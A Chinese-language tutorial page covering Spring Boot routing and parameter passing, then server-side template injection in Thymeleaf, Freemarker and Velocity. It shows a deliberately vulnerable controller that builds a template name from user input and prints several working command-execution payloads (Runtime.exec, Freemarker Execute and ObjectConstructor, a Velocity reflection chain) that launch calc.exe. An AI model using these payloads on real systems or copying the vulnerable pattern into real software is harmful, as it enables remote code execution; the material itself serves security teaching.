当前位置: 首页 > news >正文

Web开发-JavaEE应用SpringBoot栈模版注入ThymeleafFreemarkerVelocity

知识点:
1、安全开发-JavaEE-开发框架-SpringBoot&路由&传参
2、安全开发-JavaEE-模版引擎-Thymeleaf&Freemarker&Velocity

一、演示案例-WEB开发-JavaEE-开发框架-SpringBoot&路由&传参

类似于php语言中的thinkphp,不过要更加优秀。
参考:https://springdoc.cn/spring-boot/

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

1、路由映射

@RequestMapping @GetMapping等

2、参数传递

@RequestParam

3、数据响应

@RestController @Controller(请求)
@RestController注解相当于@ResponseBody(响应)+@Controller(请求)合作用。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

二、演示案例-WEB开发-JavaEE-模版引擎-Thymeleaf&Freemarker&Velocity

Thymeleaf

参考:https://xz.aliyun.com/news/9962

1、新建SpringBoot项目包含Web,Thymeleaf

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2、配置application.properties修改缓存

在这里插入图片描述

3、创建模版目录和文件,文件定义修改变量

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

4、新建Controller目录及文件,指定路由配置

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

5、更换SpringBoot及Thymeleaf版本测试POC

@Controller
public class IndexController {@RequestMapping("/index")public String index(Model model) {
//替换模版html文件中的data变量值
model.addAttribute("data", "你好 小迪");
//使用index模版文件return "index";}

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

    @RequestMapping("/indexs")public String index(Model model,@RequestParam String lang) {
//替换模版html文件中的data变量值
model.addAttribute("data", "Hello xiaodi");
//使用index+变量lang模版文件return "index-"+lang;}
}

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

利用条件:Thymeleaf漏洞版本,可控渲染模版文件
Poc:__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc.exe%22).getInputStream()).next()%7d__::.x

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Freemarker

参考:https://mp.weixin.qq.com/s/TtNxfSYsB4HMEpW_OBniew

1、新建SpringBoot项目包含Web,Freemarker

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2、配置application.properties修改缓存

在这里插入图片描述

3、创建模版目录和文件,文件定义修改变量

在这里插入图片描述
在这里插入图片描述

4、新建Controller目录及文件,指定路由配置

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

5、更换SpringBoot及Freemarker版本测试POC

 <#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")}

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc.exe").start()}<#assign value="freemarker.template.utility.JythonRuntime"?new()>${value("calc.exe")}<@value>import os;os.system("calc.exe")</@value>//@value为自定义标签利用条件:可控渲染的模版文件

Velocity

在这里插入图片描述
在这里插入图片描述
参考:https://blog.csdn.net/2401_83799022/article/details/141600988

<dependency><groupId>org.apache.velocity</groupId><artifactId>velocity</artifactId><version>1.7</version>
</dependency>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Poc:%23set($e%3D"e")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc")

在这里插入图片描述

利用条件:Velocity漏洞版本,可控模版变量或文件

在这里插入图片描述
在这里插入图片描述

相关文章:

  • Spring AI应用系列——基于OpenTelemetry实现大模型调用的可观测性实践
  • 益鑫通汽车连接器可替代Molex,JST
  • Axure疑难杂症:全局变量跨页面赋值、中继器交互(玩转全局变量)
  • 【Axure教程】增删改饼图
  • python实战项目67:空气质量在线检测平台js逆向
  • Neo4j多关系或多路径
  • 高并发内存池(五):性能测试与性能优化
  • 5.运输层
  • 使用skywalking进行go的接口监控和报警
  • Galini AI 技术实现方案及 GitHub 开源库推荐
  • EchoMimic 阿里开源数字人项目的复现过程
  • Vue 项目中运行 `npm run dev` 时发生的过程
  • 【优选算法 | 前缀和】前缀和算法:高效解决区间求和问题的关键
  • VR汽车线束:汽车制造的新变革
  • 改进系列(10):基于SwinTransformer+CBAM+多尺度特征融合+FocalLoss改进:自动驾驶地面路况识别
  • 【Bootstrap V4系列】学习入门教程之 加载必要文件和入门模板
  • IDEA git配置[通俗易懂]
  • 网络原理 - 12(HTTP/HTTPS - 3 - 响应)
  • Spring Boot 中 `@EnableConfigurationProperties` 注解
  • 【c++】【STL】list详解
  • 人民日报评论员:因势利导对经济布局进行调整优化
  • 神十九乘组安全顺利出舱
  • 中国人保聘任田耕为副总裁,此前为工行浙江省分行行长
  • 郭继孚被撤销全国政协委员资格,此前为北京交通发展研究院长
  • 总书记考察的上海“模速空间”,是一个怎样的空间?
  • 外交部:美方应在平等、尊重和互惠的基础上同中方开展对话